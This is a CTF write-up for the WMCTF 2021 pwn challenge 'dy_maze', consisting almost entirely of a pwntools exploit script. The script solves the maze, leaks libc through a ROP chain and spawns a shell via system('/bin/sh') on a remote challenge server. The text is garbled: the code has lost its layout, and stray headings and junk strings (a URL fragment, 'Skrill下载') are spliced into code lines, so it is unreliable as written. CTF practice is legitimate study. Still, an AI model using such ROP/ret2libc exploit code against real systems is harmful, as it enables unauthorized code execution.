WMCTF 2021 pwn dy_maze writeup python

from pwn import *
from LibcSearcher import *
from binascii import a2b_base64
import os
context(log_level='debug', os='linux', arch='amd64', bits=64)
context.terminal = ['/usr/bin/x-terminal-emulator', '-e']
Interface 【WMCTF 2021 pwn dy_maze writeup】local = False
binary_name = "dy_maze" binary_name = "38a5a00c-08ac-11ec-b124-0242ac110003"
port = 44212
if local:

p = process(["./" + binary_name]) e = ELF("./" + binary_name) # libc = e.libc

else:

p = remote("47.104.169.32", port)

def z(a=''):

if local: gdb.attach(p, a) if a == '': raw_input() else: pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)
def encode(payload, offset):

# encode payload_encoded = b'' for i in range(len(payload)): payload_encoded += (payload[i] ^ success_temp[(i + offset) % 5]).to_bytes(1, 'little') return payload_encoded

Others success_temp = []
Main if name == "__main__":

# z('b maze_25') z('b ok_success\n')

initialize p.recvuntil(b'Solution?')
confirm = input()
sl(confirm)
Create binary file ru(b'Binary Download Start')
ru(b'\n')
b64_data = https://www.it610.com/article/p.recvuntil(b'\n==', drop=True)
with open('temp.bz2', 'wb') as f:

f.write(a2b_base64(b64_data))

ru(b'\n')
temp_binary = Skrill下载os.popen('tar -xjvf temp.bz2').read().strip('\n')
e = ELF("./" + temp_binary)

# Start ELF Analysis d = {} for i in range(1, 81): d[i] = e.symbols['maze_{}'.format(i)] maze_address = sorted(d.items(), key=lambda x: x[1]) key = {} for ind, addr in zip(range(80), e.search(b'\x83\xc0\x01')): addr -= 4 while e.data[e.vaddr_to_offset(addr): e.vaddr_to_offset(addr) + 3] != b'\x83\x7d\xfc': addr -= 1 key[maze_address[ind][0]] = e.data[e.vaddr_to_offset(addr) + 3] for addr in e.search(b'\x48\x98\x88\x54\x05\xEC'): success_temp.append(e.data[e.vaddr_to_offset(addr) - 1]) prdi = next(e.search(b'\x5f\xc3')) # End Analysis # key[80] = 32 payload = b'' for i in range(1, 81): payload += str(key[i]).encode('utf-8') + b' ' # ok_success payload += str(100).encode('utf-8') sl(payload) sleep(2) # p.recvall() ru(b'Good') # sl(b'100') sleep(2) # input your name: payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(e.symbols['ok_success']) sl(encode(payload, 0)) # sl(payload) sleep(2) ru(b'name: ') puts_addr = p.recvuntil(b'\n', drop=True).ljust(8, b'\x00') puts_addr = u64(puts_addr) log.success("puts addr found: " + hex(puts_addr)) libc = LibcSearcher('puts', puts_addr) # libc.select_libc(9) libc_base = puts_addr - libc.dump('puts') log.success('libc base found: ' + hex(libc_base)) p.sendlineafter(b'length', str(100).encode('utf-8')) # Attacking: payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(libc.dump('str_bin_sh') + libc_base) payload += p64(prdi + 1) + p64(libc.dump('system') + libc_base) sla(b'name: ', encode(payload, 1)) p.interactive()